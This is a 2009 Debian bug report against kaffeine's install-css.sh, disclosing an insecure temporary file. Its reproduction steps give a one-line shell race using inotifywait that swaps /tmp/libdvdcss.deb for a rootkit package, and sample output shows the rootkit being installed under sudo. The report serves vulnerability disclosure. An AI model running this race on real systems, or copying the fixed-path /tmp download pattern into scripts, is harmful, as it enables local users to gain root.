[Pkg-kde-extras] Bug#554772: install-css.sh: insecure temporary file /tmp/libdvdcss.deb

Timo Juhani Lindfors timo.lindfors at iki.fi
Fri Nov 6 12:09:54 UTC 2009


Package: kaffeine
Version: 0.8.7-1
Severity: normal
Tags: security

Steps to reproduce:
1) Malice starts the following command in the background with the
   privileges of her normal user account:

sh -c 'echo > /tmp/libdvdcss.deb; inotifywait /tmp/libdvdcss.deb; rm /tmp/libdvdcss.deb; mv /tmp/rootkit.deb /tmp/libdvdcss.deb' &

2) Malice calls the local administrator Trent and complains that she
   can't watch DVDs.

3) Guided by /usr/share/doc/kaffeine/README.Debian Trent runs

sudo bash /usr/share/doc/kaffeine/install-css.sh

Expected results:
3) Code to decrypt DVDs is installed.

Actual results:
3) Due to insecure use of temporary files in install-css.sh Malice's
   rootkit.deb is installed:

$ sudo bash /usr/share/doc/kaffeine/install-css.sh
--2009-11-06 13:54:46--  http://www.dtek.chalmers.se/groups/dvd/deb/libdvdcss2_1.2.5-1_amd64.deb
Resolving www.dtek.chalmers.se... 129.16.30.198
Connecting to www.dtek.chalmers.se|129.16.30.198|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 26176 (26K) [text/plain]
Saving to: `/tmp/libdvdcss.deb'

100%[=====================================>] 26,176      --.-K/s   in 0.03s

2009-11-06 13:54:47 (799 KB/s) - `/tmp/libdvdcss.deb' saved [26176/26176]

(Reading database ... 176859 files and directories currently installed.)
Unpacking replacement rootkit ...
Setting up rootkit (0.1-1) ...
Processing triggers for man-db ...


-- System Information:
Debian Release: 5.0.3
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.26-2-xen-amd64 (SMP w/4 CPU cores)
Locale: LANG=C, LC_CTYPE=fi_FI (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/bash

Versions of packages kaffeine depends on:
ii  hdparm           8.9-3                   tune hard disk parameters for high
ii  kdelibs4c2a      4:3.5.10.dfsg.1-0lenny2 core libraries and binaries for al
ii  libc6            2.7-18                  GNU C Library: Shared libraries
ii  libcdparanoia0   3.10.2+debian-5         audio extraction tool for sampling
ii  libgcc1          1:4.3.2-1.1             GCC support library
ii  libogg0          1.1.3-4                 Ogg Bitstream Library
ii  libqt3-mt        3:3.3.8b-5              Qt GUI Library (Threaded runtime v
ii  libstdc++6       4.3.2-1.1               The GNU Standard C++ Library v3
ii  libvorbis0a      1.2.0.dfsg-3.1          The Vorbis General Audio Compressi
ii  libvorbisenc2    1.2.0.dfsg-3.1          The Vorbis General Audio Compressi
ii  libx11-6         2:1.1.5-2               X11 client-side library
ii  libxcb1          1.1-1.2                 X C Binding
ii  libxext6         2:1.0.4-1               X11 miscellaneous extension librar
ii  libxine1         1.1.14-6                the xine video/media player librar
ii  libxine1-ffmpeg  1.1.14-6                MPEG-related plugins for libxine1
ii  libxine1-x       1.1.14-6                X desktop video output plugins for
ii  libxinerama1     2:1.0.3-2               X11 Xinerama extension library
ii  libxtst6         2:1.0.3-1               X11 Testing -- Resource extension 

kaffeine recommends no packages.

kaffeine suggests no packages.

-- no debconf information





More information about the pkg-kde-extras mailing list